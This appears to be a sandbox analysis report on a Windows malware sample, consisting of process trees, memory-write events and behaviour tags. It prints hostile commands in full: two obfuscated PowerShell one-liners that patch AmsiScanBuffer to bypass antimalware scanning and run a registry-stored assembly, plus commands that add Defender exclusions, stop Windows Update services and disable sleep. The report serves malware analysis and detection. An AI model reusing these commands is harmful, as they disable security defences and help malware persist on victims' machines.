PID 4600 wrote to memory of 2968 4600 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe 84 PID 2968 wrote to memory of 1436 2968 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp 85 PID 2968 wrote to memory of 1436 2968 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp 85 PID 2968 wrote to memory of 824 2968 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp 86 PID 2968 wrote to memory of 824 2968 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp 86 PID 2968 wrote to memory of 4608 2968 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp 87 PID 2968 wrote to memory of 4608 2968 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp 87 PID 824 wrote to memory of 4300 824 RuntimeBroker.exe 88 PID 824 wrote to memory of 4300 824 RuntimeBroker.exe 88 PID 824 wrote to memory of 1200 824 RuntimeBroker.exe 90 PID 824 wrote to memory of 1200 824 RuntimeBroker.exe 90 PID 824 wrote to memory of 4876 824 RuntimeBroker.exe 92 PID 824 wrote to memory of 4876 824 RuntimeBroker.exe 92 PID 824 wrote to memory of 3124 824 RuntimeBroker.exe 94 PID 824 wrote to memory of 3124 824 RuntimeBroker.exe 94 PID 5080 wrote to memory of 2356 5080 cmd.exe 108 PID 5080 wrote to memory of 2356 5080 cmd.exe 108 PID 1436 wrote to memory of 4768 1436 planet.exe 120 PID 1436 wrote to memory of 4768 1436 planet.exe 120 PID 1436 wrote to memory of 4768 1436 planet.exe 120 PID 1436 wrote to memory of 4768 1436 planet.exe 120 PID 1436 wrote to memory of 4768 1436 planet.exe 120 PID 1436 wrote to memory of 4768 1436 planet.exe 120 PID 4400 wrote to memory of 3088 4400 powershell.EXE 140 PID 4400 wrote to memory of 3088 4400 powershell.EXE 140 PID 4400 wrote to memory of 3088 4400 powershell.EXE 140 PID 4400 wrote to memory of 3088 4400 powershell.EXE 140 PID 4400 wrote to memory of 3088 4400 powershell.EXE 140 PID 4400 wrote to memory of 3088 4400 powershell.EXE 140 PID 4400 wrote to memory of 3088 4400 powershell.EXE 140 PID 4400 wrote to memory of 3088 4400 powershell.EXE 140 PID 3088 wrote to memory of 612 3088 dllhost.exe 5 PID 3088 wrote to memory of 668 3088 dllhost.exe 7 PID 3088 wrote to memory of 944 3088 dllhost.exe 12 PID 3088 wrote to memory of 388 3088 dllhost.exe 13 PID 3088 wrote to memory of 432 3088 dllhost.exe 14 PID 3088 wrote to memory of 1048 3088 dllhost.exe 16 PID 3088 wrote to memory of 1104 3088 dllhost.exe 17 PID 3088 wrote to memory of 1120 3088 dllhost.exe 18 PID 3088 wrote to memory of 1172 3088 dllhost.exe 19 PID 3088 wrote to memory of 1212 3088 dllhost.exe 20 PID 668 wrote to memory of 2812 668 lsass.exe 50 PID 668 wrote to memory of 2812 668 lsass.exe 50 PID 3088 wrote to memory of 1244 3088 dllhost.exe 21 PID 668 wrote to memory of 2812 668 lsass.exe 50 PID 668 wrote to memory of 2812 668 lsass.exe 50 PID 668 wrote to memory of 2812 668 lsass.exe 50 PID 3088 wrote to memory of 1284 3088 dllhost.exe 22 PID 668 wrote to memory of 2812 668 lsass.exe 50 PID 3088 wrote to memory of 1332 3088 dllhost.exe 23 PID 3088 wrote to memory of 1444 3088 dllhost.exe 24 PID 2176 wrote to memory of 4448 2176 cmd.exe 147 PID 2176 wrote to memory of 4448 2176 cmd.exe 147 PID 668 wrote to memory of 2812 668 lsass.exe 50 PID 3088 wrote to memory of 1452 3088 dllhost.exe 25 PID 3088 wrote to memory of 1520 3088 dllhost.exe 26 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:388
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b1699de8-4f32-45e3-ab0b-6ecf64630960}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3088
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{e70ec9d7-1bc3-402d-9068-d27c734ea879}2⤵PID:4608
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:432
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1048
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1120
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1172 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2672
-
-
C:\ProgramData\RuntimeBroker.exeC:\ProgramData\RuntimeBroker.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:vmhhznKoAZol{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wfMsHxVqsHEVvd,[Parameter(Position=1)][Type]$qJZldsBijb)$ZfhcDdYSXOT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+'c'+''+'t'+''+[Char](101)+''+'d'+'D'+'e'+'l'+[Char](101)+''+'g'+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nMe'+[Char](109)+'or'+[Char](121)+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+'D'+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+'e'+''+'T'+''+[Char](121)+''+'p'+''+'e'+'',''+'C'+''+'l'+''+'a'+''+[Char](115)+'s,'+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+',S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+''+[Char](105)+''+'C'+''+'l'+'a'+[Char](115)+''+[Char](115)+',A'+[Char](117)+'t'+[Char](111)+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$ZfhcDdYSXOT.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+'l'+'Na'+'m'+''+'e'+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+'e'+'B'+'y'+[Char](83)+''+'i'+'g'+','+''+'P'+''+'u'+'bl'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wfMsHxVqsHEVvd).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+'ime'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+'e'+''+'d'+'');$ZfhcDdYSXOT.DefineMethod('I'+[Char](110)+''+'v'+''+[Char](111)+''+'k'+''+[Char](101)+'','Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+'B'+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'',$qJZldsBijb,$wfMsHxVqsHEVvd).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+'im'+[Char](101)+','+[Char](77)+'a'+'n'+''+[Char](97)+'g'+'e'+'d');Write-Output $ZfhcDdYSXOT.CreateType();}$itIsMBskoZDCm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'te'+'m'+''+'.'+''+'d'+''+[Char](108)+'l')}).GetType('Mic'+[Char](114)+''+[Char](111)+''+'s'+''+'o'+'f'+[Char](116)+''+[Char](46)+''+'W'+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+'v'+'e'+''+[Char](77)+'et'+'h'+'o'+[Char](100)+''+'s'+'');$gMVAJHaGhcLDYV=$itIsMBskoZDCm.GetMethod(''+[Char](71)+''+'e'+'tP'+[Char](114)+'ocA'+'d'+'d'+[Char](114)+'e'+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+'t'+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gXfdGUeBIgttgoBBFyf=vmhhznKoAZol @([String])([IntPtr]);$EgXOKGAQFPilCRucajRwKy=vmhhznKoAZol @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$EKrPAwNaSdg=$itIsMBskoZDCm.GetMethod('Get'+'M'+''+'o'+''+'d'+''+[Char](117)+'l'+'e'+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$LHWtZBTvBGQNNJ=$gMVAJHaGhcLDYV.Invoke($Null,@([Object]$EKrPAwNaSdg,[Object]('L'+[Char](111)+'ad'+[Char](76)+''+'i'+'b'+'r'+'a'+[Char](114)+'y'+[Char](65)+'')));$IJPphyTBJZRtOjhgD=$gMVAJHaGhcLDYV.Invoke($Null,@([Object]$EKrPAwNaSdg,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+''+'a'+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$MpTdFHd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LHWtZBTvBGQNNJ,$gXfdGUeBIgttgoBBFyf).Invoke(''+'a'+''+[Char](109)+'s'+'i'+''+[Char](46)+'d'+'l'+'l');$vzJLyaSibLMVgtDCb=$gMVAJHaGhcLDYV.Invoke($Null,@([Object]$MpTdFHd,[Object](''+[Char](65)+'m'+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+'u'+'f'+'f'+[Char](101)+''+[Char](114)+'')));$mJKrJVxRzd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IJPphyTBJZRtOjhgD,$EgXOKGAQFPilCRucajRwKy).Invoke($vzJLyaSibLMVgtDCb,[uint32]8,4,[ref]$mJKrJVxRzd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vzJLyaSibLMVgtDCb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IJPphyTBJZRtOjhgD,$EgXOKGAQFPilCRucajRwKy).Invoke($vzJLyaSibLMVgtDCb,[uint32]8,0x20,[ref]$mJKrJVxRzd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+'AR'+'E'+'').GetValue('di'+[Char](97)+''+[Char](108)+''+'e'+''+'r'+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AThBtDbzQKGd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yPCdCIZhpXCDhk,[Parameter(Position=1)][Type]$RERmApxrOf)$pWlanYLjGoT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+'l'+'e'+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+'r'+''+'y'+'Mo'+'d'+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+','+'P'+'u'+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+'a'+'l'+''+[Char](101)+''+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+[Char](105)+''+'C'+'l'+'a'+'s'+[Char](115)+''+','+''+[Char](65)+''+'u'+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pWlanYLjGoT.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+'am'+'e'+','+'H'+'i'+'d'+''+[Char](101)+''+'B'+'ySi'+'g'+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$yPCdCIZhpXCDhk).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+'na'+'g'+'e'+'d'+'');$pWlanYLjGoT.DefineMethod('I'+[Char](110)+''+'v'+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+'lic'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'eB'+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+[Char](116)+','+[Char](86)+'i'+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RERmApxrOf,$yPCdCIZhpXCDhk).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+'age'+'d'+'');Write-Output $pWlanYLjGoT.CreateType();}$nZhFCeZehwfYr=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'ros'+[Char](111)+''+[Char](102)+''+'t'+'.'+'W'+''+'i'+''+'n'+''+'3'+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+'e'+'N'+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+'d'+''+[Char](115)+'');$rUsHuAwHJaFjDN=$nZhFCeZehwfYr.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+'o'+'c'+'A'+''+[Char](100)+'d'+'r'+''+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FWSpqzQgaoKVqeZmGmL=AThBtDbzQKGd @([String])([IntPtr]);$xkHAQVitcbMWYZsxHaSKLE=AThBtDbzQKGd @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eyURWssqOxI=$nZhFCeZehwfYr.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+'u'+''+'l'+''+[Char](101)+'H'+[Char](97)+''+'n'+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+'32'+'.'+''+'d'+'ll')));$aLpPjBuWAjKyqw=$rUsHuAwHJaFjDN.Invoke($Null,@([Object]$eyURWssqOxI,[Object](''+'L'+''+[Char](111)+'a'+'d'+''+[Char](76)+''+'i'+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$PhZIURpwWaWPSQTvz=$rUsHuAwHJaFjDN.Invoke($Null,@([Object]$eyURWssqOxI,[Object](''+[Char](86)+''+'i'+'r'+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+'t'+'e'+''+'c'+''+[Char](116)+'')));$DNzsiyf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aLpPjBuWAjKyqw,$FWSpqzQgaoKVqeZmGmL).Invoke(''+[Char](97)+''+[Char](109)+'s'+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'');$eFaUrXnsLVGkEBmcm=$rUsHuAwHJaFjDN.Invoke($Null,@([Object]$DNzsiyf,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$PVYLKEjlKr=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PhZIURpwWaWPSQTvz,$xkHAQVitcbMWYZsxHaSKLE).Invoke($eFaUrXnsLVGkEBmcm,[uint32]8,4,[ref]$PVYLKEjlKr);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$eFaUrXnsLVGkEBmcm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PhZIURpwWaWPSQTvz,$xkHAQVitcbMWYZsxHaSKLE).Invoke($eFaUrXnsLVGkEBmcm,[uint32]8,0x20,[ref]$PVYLKEjlKr);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+'T'+'WA'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+'a'+'l'+[Char](101)+'rs'+'t'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4988 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2568
-
-
-
C:\ProgramData\RuntimeBroker.exeC:\ProgramData\RuntimeBroker.exe2⤵
- Executes dropped EXE
PID:1276
-
-
C:\ProgramData\RuntimeBroker.exeC:\ProgramData\RuntimeBroker.exe2⤵
- Executes dropped EXE
PID:4416
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1212
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1244
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1332
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1444
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2488
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1520
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1796
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1924
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1980
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2016
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2208
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2644
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2728
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2776
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2812
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2848
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2156
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3268
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3388
-
C:\Users\Admin\AppData\Local\Temp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe"C:\Users\Admin\AppData\Local\Temp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Users\Admin\AppData\Local\Temp\is-29HGF.tmp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp"C:\Users\Admin\AppData\Local\Temp\is-29HGF.tmp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp" /SL5="$502D4,5022309,876544,C:\Users\Admin\AppData\Local\Temp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Users\Admin\AppData\Local\Temp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe"C:\Users\Admin\AppData\Local\Temp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe" /VERYSILENT4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Users\Admin\AppData\Local\Temp\is-AVIIP.tmp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp"C:\Users\Admin\AppData\Local\Temp\is-AVIIP.tmp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp" /SL5="$602D6,5022309,876544,C:\Users\Admin\AppData\Local\Temp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\planet.exe"C:\Windows\planet.exe" /verysilent6⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart7⤵
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart8⤵PID:2356
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc7⤵
- Launches sc.exe
PID:4328
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc7⤵
- Launches sc.exe
PID:832
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv7⤵
- Launches sc.exe
PID:4452
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits7⤵
- Launches sc.exe
PID:1680
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc7⤵
- Launches sc.exe
PID:3224
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4380
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4368
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
